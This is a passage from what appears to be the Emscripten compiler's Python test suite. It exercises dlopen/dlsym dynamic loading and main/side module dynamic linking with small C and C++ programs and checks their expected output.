for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
return 0;
}
'''
self.do_run(src, 'Sort with main comparison: 5 4 3 2 1 *Sort with lib comparison: 1 2 3 4 5 *',
output_nicerizer=lambda x: x.replace('\n', '*'))
@needs_dylink
def test_dlfcn_data_and_fptr(self):
# Failing under v8 since: https://chromium-review.googlesource.com/712595
if self.is_wasm():
self.banned_js_engines = [config.V8_ENGINE]
create_file('liblib.c', r'''
#include <stdio.h>
int theglobal = 42;
extern void parent_func(); // a function that is defined in the parent
int* lib_get_global_addr() {
return &theglobal;
}
void lib_fptr() {
printf("Second calling lib_fptr from main.\n");
parent_func();
// call it also through a pointer, to check function pointer indexing
void (*p_f)();
p_f = parent_func;
p_f();
}
void (*func(int x, void(*fptr)()))() {
printf("In func: %d\n", x);
fptr();
return lib_fptr;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <stdio.h>
#include <dlfcn.h>
#include <emscripten.h>
typedef void (*FUNCTYPE(int, void(*)()))();
FUNCTYPE func;
void EMSCRIPTEN_KEEPALIVE parent_func() {
printf("parent_func called from child\n");
}
void main_fptr() {
printf("First calling main_fptr from lib.\n");
}
int main() {
void* lib_handle;
FUNCTYPE* func_fptr;
// Test basic lib loading.
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\n");
return 1;
}
// Test looked up function.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
// Load twice to test cache.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
if (func_fptr == NULL) {
printf("Could not find func.\n");
return 1;
}
// Test passing function pointers across module bounds.
void (*fptr)() = func_fptr(13, main_fptr);
fptr();
// Test global data.
int* globaladdr = (int*) dlsym(lib_handle, "theglobal");
if (globaladdr == NULL) {
printf("Could not find global.\n");
return 1;
}
printf("Var: %d\n", *globaladdr);
return 0;
}
'''
self.do_run(src, '''\
In func: 13
First calling main_fptr from lib.
Second calling lib_fptr from main.
parent_func called from child
parent_func called from child
Var: 42
''', force_c=True)
@needs_dylink
def test_dlfcn_varargs(self):
# This test is not actually valid - it fails natively. The child should fail
# to be loaded, not load and successfully see the parent print_ints func.
create_file('liblib.c', r'''
void print_ints(int n, ...);
void func() {
print_ints(2, 13, 42);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <stdarg.h>
#include <stdio.h>
#include <dlfcn.h>
#include <assert.h>
void print_ints(int n, ...) {
va_list args;
va_start(args, n);
for (int i = 0; i < n; i++) {
printf("%d\n", va_arg(args, int));
}
va_end(args);
}
int main() {
void* lib_handle;
void (*fptr)();
print_ints(2, 100, 200);
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle);
fptr = (void (*)())dlsym(lib_handle, "func");
fptr();
return 0;
}
'''
self.do_run(src, '100\n200\n13\n42\n', force_c=True)
@needs_dylink
def test_dlfcn_alignment_and_zeroing(self):
self.set_setting('INITIAL_MEMORY', '16mb')
create_file('liblib.c', r'''
int prezero = 0;
__attribute__((aligned(1024))) int superAligned = 12345;
int postzero = 0;
''')
self.build_dlfcn_lib('liblib.c')
for i in range(10):
curr = '%d.so' % i
shutil.copyfile('liblib.so', curr)
self.prep_dlfcn_main()
self.set_setting('INITIAL_MEMORY', '128mb')
create_file('src.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>
#include <assert.h>
#include <emscripten.h>
int main() {
printf("'prepare' memory with non-zero inited stuff\n");
int num = 120 * 1024 * 1024; // total is 128; we'll use 5*5 = 25 at least, so allocate pretty much all of it
void* mem = malloc(num);
assert(mem);
printf("setting this range to non-zero: %ld - %ld\n", (long)mem, ((long)mem) + num);
memset(mem, 1, num);
EM_ASM({
var value = HEAP8[64*1024*1024];
out('verify middle of memory is non-zero: ' + value);
assert(value === 1);
});
free(mem);
for (int i = 0; i < 10; i++) {
char curr[] = "?.so";
curr[0] = '0' + i;
printf("loading %s\n", curr);
void* lib_handle = dlopen(curr, RTLD_NOW);
if (!lib_handle) {
puts(dlerror());
assert(0);
}
printf("getting superAligned\n");
int* superAligned = (int*)dlsym(lib_handle, "superAligned");
assert(superAligned);
assert(((long)superAligned) % 1024 == 0); // alignment
printf("checking value of superAligned, at %p\n", superAligned);
assert(*superAligned == 12345); // value
printf("getting prezero\n");
int* prezero = (int*)dlsym(lib_handle, "prezero");
assert(prezero);
printf("checking value of prezero, at %p\n", prezero);
assert(*prezero == 0);
*prezero = 1;
assert(*prezero != 0);
printf("getting postzero\n");
int* postzero = (int*)dlsym(lib_handle, "postzero");
printf("checking value of postzero, at %p\n", postzero);
assert(postzero);
printf("checking value of postzero\n");
assert(*postzero == 0);
*postzero = 1;
assert(*postzero != 0);
}
printf("success.\n");
return 0;
}
''')
self.do_runf('src.c', 'success.\n')
@needs_dylink
def test_dlfcn_self(self):
self.set_setting('MAIN_MODULE')
self.set_setting('EXPORT_ALL')
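# Helper: extract the names of data (global) exports from the module's wasm text
# format, so they can be compared against the expected exports file below.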
def get_data_exports(wasm):
wat = self.get_wasm_text(wasm)
lines = wat.splitlines()
exports = [l for l in lines if l.strip().startswith('(export ')]
data_exports = [l for l in exports if '(global ' in l]
data_exports = [d.split()[1].strip('"') for d in data_exports]
return data_exports
self.do_core_test('test_dlfcn_self.c')
data_exports = get_data_exports('test_dlfcn_self.wasm')
data_exports = '\n'.join(sorted(data_exports)) + '\n'
self.assertFileContents(test_file('core/test_dlfcn_self.exports'), data_exports)
@needs_dylink
def test_dlfcn_unique_sig(self):
create_file('liblib.c', r'''
#include <stdio.h>
int myfunc(int a, int b, int c, int d, int e, int f, int g, int h, int i, int j, int k, int l, int m) {
return 13;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
typedef int (*FUNCTYPE)(int, int, int, int, int, int, int, int, int, int, int, int, int);
int main() {
void *lib_handle;
FUNCTYPE func_ptr;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
func_ptr = (FUNCTYPE)dlsym(lib_handle, "myfunc");
assert(func_ptr != NULL);
assert(func_ptr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) == 13);
puts("success");
return 0;
}
''')
self.do_runf('main.c', 'success')
@needs_dylink
def test_dlfcn_info(self):
create_file('liblib.c', r'''
#include <stdio.h>
int myfunc(int a, int b, int c, int d, int e, int f, int g, int h, int i, int j, int k, int l, int m) {
return 13;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', '''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
typedef int (*FUNCTYPE)(int, int, int, int, int, int, int, int, int, int, int, int, int);
int main() {
void *lib_handle;
FUNCTYPE func_ptr;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
func_ptr = (FUNCTYPE)dlsym(lib_handle, "myfunc");
assert(func_ptr != NULL);
assert(func_ptr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) == 13);
/* Verify that we don't corrupt func_ptr when calling dladdr. */
Dl_info info;
memset(&info, 0, sizeof(info));
dladdr(func_ptr, &info);
assert(func_ptr != NULL);
assert(func_ptr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) == 13);
/* Verify something useful lives in info. */
assert(info.dli_fname != NULL);
assert(info.dli_fbase == NULL);
assert(info.dli_sname == NULL);
assert(info.dli_saddr == NULL);
puts("success");
return 0;
}
''')
self.do_runf('main.c', 'success')
@needs_dylink
def test_dlfcn_stacks(self):
create_file('liblib.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
int myfunc(const char *input) {
char bigstack[1024] = { 0 };
// make sure we didn't just trample the stack!
assert(!strcmp(input, "foobar"));
snprintf(bigstack, sizeof(bigstack), "%s", input);
return strlen(bigstack);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', '''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
#include <string.h>
typedef int (*FUNCTYPE)(const char *);
int main() {
void *lib_handle;
FUNCTYPE func_ptr;
char str[128];
snprintf(str, sizeof(str), "foobar");
// HACK: Use strcmp in the main executable so that it doesn't get optimized out and the dynamic library
// is able to use it.
assert(!strcmp(str, "foobar"));
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
func_ptr = (FUNCTYPE)dlsym(lib_handle, "myfunc");
assert(func_ptr != NULL);
assert(func_ptr(str) == 6);
puts("success");
return 0;
}
''')
self.do_runf('main.c', 'success')
@needs_dylink
def test_dlfcn_funcs(self):
create_file('liblib.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
typedef void (*voidfunc)();
typedef void (*intfunc)(int);
void callvoid(voidfunc f) { f(); }
void callint(voidfunc f, int x) { f(x); }
void void_0() { printf("void 0\n"); }
void void_1() { printf("void 1\n"); }
voidfunc getvoid(int i) {
switch(i) {
case 0: return void_0;
case 1: return void_1;
default: return NULL;
}
}
void int_0(int x) { printf("int 0 %d\n", x); }
void int_1(int x) { printf("int 1 %d\n", x); }
intfunc getint(int i) {
switch(i) {
case 0: return int_0;
case 1: return int_1;
default: return NULL;
}
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
typedef void (*voidfunc)();
typedef void (*intfunc)(int);
typedef void (*voidcaller)(voidfunc);
typedef void (*intcaller)(intfunc, int);
typedef voidfunc (*voidgetter)(int);
typedef intfunc (*intgetter)(int);
void void_main() { printf("void_main.\n"); }
void int_main(int x) { printf("int_main %d\n", x); }
int main() {
printf("go\n");
void *lib_handle;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
voidcaller callvoid = (voidcaller)dlsym(lib_handle, "callvoid");
assert(callvoid != NULL);
callvoid(void_main);
intcaller callint = (intcaller)dlsym(lib_handle, "callint");
assert(callint != NULL);
callint(int_main, 201);
voidgetter getvoid = (voidgetter)dlsym(lib_handle, "getvoid");
assert(getvoid != NULL);
callvoid(getvoid(0));
callvoid(getvoid(1));
intgetter getint = (intgetter)dlsym(lib_handle, "getint");
assert(getint != NULL);
callint(getint(0), 54);
callint(getint(1), 9000);
assert(getint(1000) == NULL);
puts("ok");
return 0;
}
''')
self.do_runf('main.c', '''go
void_main.
int_main 201
void 0
void 1
int 0 54
int 1 9000
ok
''')
@needs_dylink
def test_dlfcn_mallocs(self):
# memory will be exhausted without functional malloc/free
self.set_setting('INITIAL_MEMORY', '64mb')
create_file('liblib.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void *mallocproxy(int n) { return malloc(n); }
void freeproxy(void *p) { free(p); }
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
self.do_runf(test_file('dlmalloc_proxy.c'), '*294,153*')
@needs_dylink
def test_dlfcn_longjmp(self):
create_file('liblib.c', r'''
#include <setjmp.h>
#include <stdio.h>
void jumpy(jmp_buf buf) {
static int i = 0;
i++;
if (i == 10) longjmp(buf, i);
printf("pre %d\n", i);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
#include <setjmp.h>
typedef void (*jumpfunc)(jmp_buf);
int main() {
printf("go!\n");
void *lib_handle;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
jumpfunc jumpy = (jumpfunc)dlsym(lib_handle, "jumpy");
assert(jumpy);
jmp_buf buf;
int jmpval = setjmp(buf);
if (jmpval == 0) {
while (1) jumpy(buf);
} else {
printf("out!\n");
}
return 0;
}
''')
self.do_runf('main.c', '''go!
pre 1
pre 2
pre 3
pre 4
pre 5
pre 6
pre 7
pre 8
pre 9
out!
''', force_c=True)
# TODO: make this work. need to forward tempRet0 across modules
# TODO Enable @with_both_eh_sjlj (the test is not working now)
@needs_dylink
def zzztest_dlfcn_exceptions(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
create_file('liblib.cpp', r'''
extern "C" {
int ok() {
return 65;
}
int fail() {
throw 123;
}
}
''')
self.build_dlfcn_lib('liblib.cpp')
self.prep_dlfcn_main()
src = r'''
#include <assert.h>
#include <stdio.h>
#include <dlfcn.h>
typedef int (*intfunc)();
int main() {
printf("go!\n");
void *lib_handle;
lib_handle = dlopen("liblib.so", RTLD_NOW);
assert(lib_handle != NULL);
intfunc okk = (intfunc)dlsym(lib_handle, "ok");
intfunc faill = (intfunc)dlsym(lib_handle, "fail");
assert(okk && faill);
try {
printf("ok: %d\n", okk());
} catch(...) {
printf("wha\n");
}
try {
printf("fail: %d\n", faill());
} catch(int x) {
printf("int %d\n", x);
}
try {
printf("fail: %d\n", faill());
} catch(double x) {
printf("caught %f\n", x);
}
return 0;
}
'''
self.do_run(src, '''go!
ok: 65
int 123
ok
''')
@needs_dylink
def test_dlfcn_handle_alloc(self):
# verify that dlopen does not allocate already used handles
dirname = self.get_dir()
def indir(name):
return os.path.join(dirname, name)
create_file('a.cpp', r'''
#include <stdio.h>
static class A {
public:
A() {
puts("a: loaded");
}
} _;
''')
create_file('b.cpp', r'''
#include <stdio.h>
static class B {
public:
B() {
puts("b: loaded");
}
} _;
''')
self.build_dlfcn_lib('a.cpp')
shutil.move(indir('liblib.so'), indir('liba.so'))
self.build_dlfcn_lib('b.cpp')
shutil.move(indir('liblib.so'), indir('libb.so'))
self.set_setting('MAIN_MODULE')
self.set_setting('NODERAWFS')
self.clear_setting('SIDE_MODULE')
create_file('main.c', r'''
#include <dlfcn.h>
#include <assert.h>
#include <stddef.h>
int main() {
void *liba, *libb, *liba2, *libb2;
int err;
liba = dlopen("liba.so", RTLD_NOW);
assert(liba != NULL);
libb = dlopen("libb.so", RTLD_NOW);
assert(libb != NULL);
// Test that opening libb a second times gives the same handle
libb2 = dlopen("libb.so", RTLD_NOW);
assert(libb == libb2);
err = dlclose(liba);
assert(!err);
liba2 = dlopen("liba.so", RTLD_NOW);
assert(liba2 != libb);
return 0;
}
''')
self.do_runf('main.c', 'a: loaded\nb: loaded\n')
@needs_dylink
@needs_non_trapping_float_to_int
def test_dlfcn_feature_in_lib(self):
self.emcc_args.append('-mnontrapping-fptoint')
create_file('liblib.c', r'''
int magic(float x) {
return __builtin_wasm_trunc_saturate_s_i32_f32(x);
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
typedef int (*fi)(float);
int main() {
void *lib_handle = dlopen("liblib.so", RTLD_NOW);
if (!lib_handle) {
puts(dlerror());
abort();
}
fi x = (fi)dlsym(lib_handle, "magic");
if (!x) {
puts(dlerror());
abort();
}
printf("float: %d.\n", x(42.99));
return 0;
}
'''
self.do_run(src, 'float: 42.\n')
def dylink_test(self, main, side, expected=None, header=None, force_c=False,
main_module=2, **kwargs):
# Same as dylink_testf but takes source code in string form
if not isinstance(side, list):
side_file = 'liblib.cpp' if not force_c else 'liblib.c'
create_file(side_file, side)
side = side_file
if not isinstance(main, list):
main_file = 'main.cpp' if not force_c else 'main.c'
create_file(main_file, main)
main = main_file
if header:
create_file('header.h', header)
return self.dylink_testf(main, side, expected, force_c, main_module=main_module, **kwargs)
def dylink_testf(self, main, side=None, expected=None, force_c=False, main_emcc_args=[],
main_module=2,
so_name='liblib.so',
need_reverse=True, **kwargs):
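# Builds `side` as a SIDE_MODULE, renames the output to so_name, then builds
# `main` as a MAIN_MODULE that links against it and checks the combined output.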
self.maybe_closure()
# Same as dylink_test but takes source code as filenames on disc.
old_args = self.emcc_args.copy()
if not expected:
outfile = shared.replace_suffix(main, '.out')
expected = read_file(outfile)
if not side:
side, ext = os.path.splitext(main)
side += '_side' + ext
# side settings
self.clear_setting('MAIN_MODULE')
self.set_setting('SIDE_MODULE')
side_suffix = 'wasm' if self.is_wasm() else 'js'
if isinstance(side, list):
out_file = 'liblib.' + side_suffix
# side is just a library
self.run_process([EMCC] + side + self.get_emcc_args() + ['-o', out_file])
else:
out_file = self.build(side, js_outfile=(side_suffix == 'js'))
shutil.move(out_file, so_name)
# main settings
self.set_setting('MAIN_MODULE', main_module)
self.clear_setting('SIDE_MODULE')
self.emcc_args += main_emcc_args
self.emcc_args.append(so_name)
if force_c:
self.emcc_args.append('-nostdlib++')
if isinstance(main, list):
# main is just a library
try_delete('main.js')
self.run_process([EMCC] + main + self.get_emcc_args() + ['-o', 'main.js'])
self.do_run('main.js', expected, no_build=True, **kwargs)
else:
self.do_runf(main, expected, force_c=force_c, **kwargs)
self.emcc_args = old_args
if need_reverse:
print('flip')
# Test the reverse as well. There we flip the role of the side module and main module.
# - We add --no-entry since the side module doesn't have a `main`
self.dylink_testf(side, main, expected, force_c, main_emcc_args + ['--no-entry'],
need_reverse=False, **kwargs)
def do_basic_dylink_test(self, **kwargs):
self.dylink_test(r'''
#include <stdio.h>
#include "header.h"
int main() {
printf("other says %d.\n", sidey());
return 0;
}
''', '''
#include "header.h"
int sidey() {
return 11;
}
''', 'other says 11.', 'int sidey();', force_c=True, **kwargs)
@needs_dylink
def test_dylink_basics(self):
self.do_basic_dylink_test(need_reverse=False)
self.verify_in_strict_mode('main.js')
@needs_dylink
def test_dylink_basics_no_modify(self):
if self.is_optimizing():
self.skipTest('no modify mode only works with non-optimizing builds')
self.set_setting('WASM_BIGINT')
self.set_setting('ERROR_ON_WASM_CHANGES_AFTER_LINK')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_basics_lld_report_undefined(self):
self.set_setting('LLD_REPORT_UNDEFINED')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_no_export(self):
self.set_setting('NO_DECLARE_ASM_MODULE_EXPORTS')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_memory_growth(self):
if not self.is_wasm():
self.skipTest('wasm only')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_safe_heap(self):
self.set_setting('SAFE_HEAP')
self.do_basic_dylink_test()
@needs_dylink
def test_dylink_function_pointer_equality(self):
self.dylink_test(r'''
#include <stdio.h>
#include "header.h"
int main() {
void* puts_side = get_address();
printf("main module address %p.\n", &puts);
printf("side module address address %p.\n", puts_side);
if (&puts == puts_side)
printf("success\n");
else
printf("failure\n");
return 0;
}
''', '''
#include <stdio.h>
#include "header.h"
void* get_address() {
return (void*)&puts;
}
''', 'success', header='void* get_address();', force_c=True)
@needs_dylink
def test_dylink_floats(self):
self.dylink_test(r'''
#include <stdio.h>
extern float sidey();
int main() {
printf("other says %.2f.\n", sidey()+1);
return 0;
}
''', '''
float sidey() { return 11.5; }
''', 'other says 12.50', force_c=True)
@needs_dylink
def test_dylink_printf(self):
self.dylink_test(r'''
#include <stdio.h>
void sidey();
int main() {
printf("hello from main\n");
sidey();
return 0;
}
''', r'''
#include <stdio.h>
void sidey() {
printf("hello from side\n");
}
''', 'hello from main\nhello from side\n', force_c=True)
# Verify that a function pointer can be passed back and forth and invoked
# on both sides.
@needs_dylink
def test_dylink_funcpointer(self):
self.dylink_test(
main=r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
intfunc sidey(intfunc f);
void a(int arg) { printf("hello from funcptr: %d\n", arg); }
int main() {
intfunc b = sidey(a);
assert(a == b);
b(0);
return 0;
}
''',
side='''
#include "header.h"
intfunc sidey(intfunc f) { f(1); return f; }
''',
expected='hello from funcptr: 1\nhello from funcptr: 0\n',
header='typedef void (*intfunc)(int );', force_c=True)
@needs_dylink
# test dynamic linking of a module with multiple function pointers, stored
# statically
def test_dylink_static_funcpointers(self):
self.dylink_test(
main=r'''
#include <stdio.h>
#include "header.h"
void areturn0() { printf("hello 0\n"); }
void areturn1() { printf("hello 1\n"); }
void areturn2() { printf("hello 2\n"); }
voidfunc func_ptrs[3] = { areturn0, areturn1, areturn2 };
int main(int argc, char **argv) {
sidey(func_ptrs[0]);
sidey(func_ptrs[1]);
sidey(func_ptrs[2]);
return 0;
}
''',
side='''
#include "header.h"
void sidey(voidfunc f) { f(); }
''',
expected='hello 0\nhello 1\nhello 2\n',
header='typedef void (*voidfunc)(); void sidey(voidfunc f);', force_c=True)
@needs_dylink
def test_dylink_funcpointers_wrapper(self):
self.dylink_test(
main=r'''\
#include <stdio.h>
#include "header.h"
int main(int argc, char **argv) {
charfunc f1 = emscripten_run_script;
f1("console.log('one')");
charfunc f2 = get();
f2("console.log('two')");
return 0;
}
''',
side='''\
#include "header.h"
charfunc get() {
return emscripten_run_script;
}
''',
expected='one\ntwo\n',
header='''\
#include <emscripten.h>
typedef void (*charfunc)(const char*);
extern charfunc get();
''', force_c=True)
@needs_dylink
def test_dylink_static_funcpointer_float(self):
self.dylink_test(
main=r'''\
#include <stdio.h>
#include "header.h"
int sidey(floatfunc f);
float func1(float f) { printf("hello 1: %f\n", f); return 0; }
floatfunc f1 = &func1;
int main(int argc, char **argv) {
printf("got: %d\n", sidey(f1));
f1(12.34);
return 0;
}
''',
side='''\
#include "header.h"
int sidey(floatfunc f) { f(56.78); return 1; }
''',
expected='hello 1: 56.779999\ngot: 1\nhello 1: 12.340000\n',
header='typedef float (*floatfunc)(float);', force_c=True)
@needs_dylink
def test_missing_signatures(self):
create_file('test_sig.c', r'''#include <emscripten.h>
int main() {
return 0 == ( (long)&emscripten_run_script_string +
(long)&emscripten_run_script );
}''')
self.set_setting('MAIN_MODULE', 1)
# also test main module with 4GB of memory. we need to emit a "maximum"
# clause then, even though 4GB is the maximum; see
# https://github.com/emscripten-core/emscripten/issues/14130
self.set_setting('ALLOW_MEMORY_GROWTH', '1')
self.set_setting('MAXIMUM_MEMORY', '4GB')
self.do_runf('test_sig.c', '')
@needs_dylink
def test_dylink_global_init(self):
self.dylink_test(r'''
#include <stdio.h>
struct Class {
Class() { printf("a new Class\n"); }
};
static Class c;
int main() {
return 0;
}
''', r'''
void nothing() {}
''', 'a new Class\n')
@needs_dylink
def test_dylink_global_inits(self):
def test():
self.dylink_test(header=r'''
#include <stdio.h>
struct Class {
Class(const char *name) { printf("new %s\n", name); }
};
''', main=r'''
#include "header.h"
static Class c("main");
int main() {
return 0;
}
''', side=r'''
#include "header.h"
static Class c("side");
''', expected=['new main\nnew side\n', 'new side\nnew main\n'])
test()
print('check warnings')
self.set_setting('ASSERTIONS', 2)
test()
# TODO: this in wasm
# full = self.run_js('src.js')
# self.assertNotContained('already exists', full)
@needs_dylink
def test_dylink_i64(self):
self.dylink_test(r'''
#include <stdio.h>
#include <stdint.h>
extern int64_t sidey();
int main() {
printf("other says %lld.\n", sidey());
return 0;
}
''', '''
#include <stdint.h>
int64_t sidey() {
return 42;
}
''', 'other says 42.', force_c=True)
@all_engines
@needs_dylink
def test_dylink_i64_b(self):
self.dylink_test(r'''
#include <stdio.h>
#include <stdint.h>
extern int64_t sidey();
int64_t testAdd(int64_t a) {
return a + 1;
}
int64_t testAddB(int a) {
return a + 1;
}
typedef int64_t (*testAddHandler)(int64_t);
testAddHandler h = &testAdd;
typedef int64_t (*testAddBHandler)(int);
testAddBHandler hb = &testAddB;
int main() {
printf("other says %lld.\n", sidey());
int64_t r = h(42);
printf("my fp says: %lld.\n", r);
int64_t rb = hb(42);
printf("my second fp says: %lld.\n", r);
}
''', '''
#include <stdint.h>
int64_t sidey() {
volatile int64_t x = 0x12345678abcdef12LL;
x += x % 17;
x = 18 - x;
return x;
}
''', 'other says -1311768467750121224.\nmy fp says: 43.\nmy second fp says: 43.', force_c=True)
@needs_dylink
@also_with_wasm_bigint
def test_dylink_i64_c(self):
self.dylink_test(r'''
#include <stdio.h>
#include <inttypes.h>
#include "header.h"
typedef int32_t (*fp_type_32)(int32_t, int32_t, int32_t);
typedef int64_t (*fp_type_64)(int32_t, int32_t, int32_t);
int32_t internal_function_ret_32(int32_t i, int32_t j, int32_t k) {
return 32;
}
int64_t internal_function_ret_64(int32_t i, int32_t j, int32_t k) {
return 64;
}
int main() {
fp_type_32 fp32_internal = &internal_function_ret_32;
fp_type_32 fp32_external = &function_ret_32;
fp_type_64 fp64_external = &function_ret_64;
fp_type_64 fp64_internal = &internal_function_ret_64;
int32_t ires32 = fp32_internal(0,0,0);
printf("res32 - internal %d\n",ires32);
int32_t eres32 = fp32_external(0,0,0);
printf("res32 - external %d\n",eres32);
int64_t ires64 = fp64_internal(0,0,0);
printf("res64 - internal %" PRId64 "\n",ires64);
int64_t eres64 = fp64_external(0,0,0);
printf("res64 - external %" PRId64 "\n",eres64);
return 0;
}
''', '''
#include "header.h"
int32_t function_ret_32(int32_t i, int32_t j, int32_t k) {
return 32;
}
int64_t function_ret_64(int32_t i, int32_t j, int32_t k) {
return 64;
}
''', '''res32 - internal 32
res32 - external 32
res64 - internal 64
res64 - external 64\n''', header='''
#include <emscripten.h>
#include <stdint.h>
EMSCRIPTEN_KEEPALIVE int32_t function_ret_32(int32_t i, int32_t j, int32_t k);
EMSCRIPTEN_KEEPALIVE int64_t function_ret_64(int32_t i, int32_t j, int32_t k);
''', force_c=True)
@needs_dylink
@also_with_wasm_bigint
def test_dylink_i64_invoke(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
self.dylink_test(r'''\
#include <stdio.h>
#include <stdint.h>
extern "C" int64_t sidey(int64_t arg);
int main(int argc, char *argv[]) {
int64_t temp = 42;
printf("got %lld\n", sidey(temp));
return 0;
}''', r'''\
#include <stdint.h>
#include <stdio.h>
#include <emscripten.h>
extern "C" {
EMSCRIPTEN_KEEPALIVE int64_t do_call(int64_t arg) {
if (arg == 0) {
throw;
}
return 2 * arg;
}
int64_t sidey(int64_t arg) {
try {
return do_call(arg);
} catch(...) {
return 0;
}
}
}''', 'got 84', need_reverse=False)
@needs_dylink
def test_dylink_class(self):
self.dylink_test(header=r'''
#include <stdio.h>
struct Class {
Class(const char *name);
};
''', main=r'''
#include "header.h"
int main() {
Class c("main");
return 0;
}
''', side=r'''
#include "header.h"
Class::Class(const char *name) { printf("new %s\n", name); }
''', expected=['new main\n'])
@needs_dylink
def test_dylink_global_var(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern int x;
int main() {
printf("extern is %d.\n", x);
return 0;
}
''', side=r'''
int x = 123;
''', expected=['extern is 123.\n'], force_c=True)
@needs_dylink
def test_dylink_global_var_modded(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern int x;
int main() {
printf("extern is %d.\n", x);
return 0;
}
''', side=r'''
int x = 123;
struct Initter {
Initter() { x = 456; }
};
Initter initter;
''', expected=['extern is 456.\n'])
@needs_dylink
def test_dylink_stdlib(self):
self.dylink_test(header=r'''
#include <math.h>
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
double pow_two(double x);
''', main=r'''
#include <stdio.h>
#include "header.h"
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
puts(ret);
printf("pow_two: %d.\n", (int)pow_two(5.9));
return 0;
}
''', side=r'''
#include "header.h"
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
double pow_two(double x) {
return pow(2, x);
}
''', expected=['hello through side\n\npow_two: 59.'], force_c=True)
@needs_dylink
def test_dylink_jslib(self):
create_file('lib.js', r'''
mergeInto(LibraryManager.library, {
test_lib_func: function(x) {
return x + 17.2;
}
});
''')
self.dylink_test(header=r'''
extern double test_lib_func(int input);
''', main=r'''
#include <stdio.h>
#include "header.h"
extern double sidey();
int main2() { return 11; }
int main() {
int input = sidey();
double temp = test_lib_func(input);
printf("other says %.2f\n", temp);
printf("more: %.5f, %d\n", temp, input);
return 0;
}
''', side=r'''
#include <stdio.h>
#include "header.h"
extern int main2();
double sidey() {
int temp = main2();
printf("main2 sed: %d\n", temp);
printf("main2 sed: %u, %c\n", temp, temp/2);
return test_lib_func(temp);
}
''', expected='other says 45.2', main_emcc_args=['--js-library', 'lib.js'], force_c=True)
@needs_dylink
def test_dylink_many_postsets(self):
NUM = 1234
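# Use a large static array of function pointers so that linking needs many
# address fix-ups ("postsets"); check that they are all applied on both sides.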
self.dylink_test(header=r'''
#include <stdio.h>
typedef void (*voidfunc)();
static void simple() {
printf("simple.\n");
}
static volatile voidfunc funcs[''' + str(NUM) + '] = { ' + ','.join(['simple'] * NUM) + r''' };
static void test() {
volatile int i = ''' + str(NUM - 1) + r''';
funcs[i]();
i = 0;
funcs[i]();
}
extern void more();
''', main=r'''
#include "header.h"
int main() {
test();
more();
return 0;
}
''', side=r'''
#include "header.h"
void more() {
test();
}
''', expected=['simple.\nsimple.\nsimple.\nsimple.\n'], force_c=True)
@needs_dylink
def test_dylink_postsets_chunking(self):
self.dylink_test(header=r'''
extern int global_var;
''', main=r'''
#include <stdio.h>
#include "header.h"
// prepare 99 global variables with local initializers
static int p = 1;
#define P(x) __attribute__((used)) int *padding##x = &p;
P(01) P(02) P(03) P(04) P(05) P(06) P(07) P(08) P(09) P(10)
P(11) P(12) P(13) P(14) P(15) P(16) P(17) P(18) P(19) P(20)
P(21) P(22) P(23) P(24) P(25) P(26) P(27) P(28) P(29) P(30)
P(31) P(32) P(33) P(34) P(35) P(36) P(37) P(38) P(39) P(40)
P(41) P(42) P(43) P(44) P(45) P(46) P(47) P(48) P(49) P(50)
P(51) P(52) P(53) P(54) P(55) P(56) P(57) P(58) P(59) P(60)
P(61) P(62) P(63) P(64) P(65) P(66) P(67) P(68) P(69) P(70)
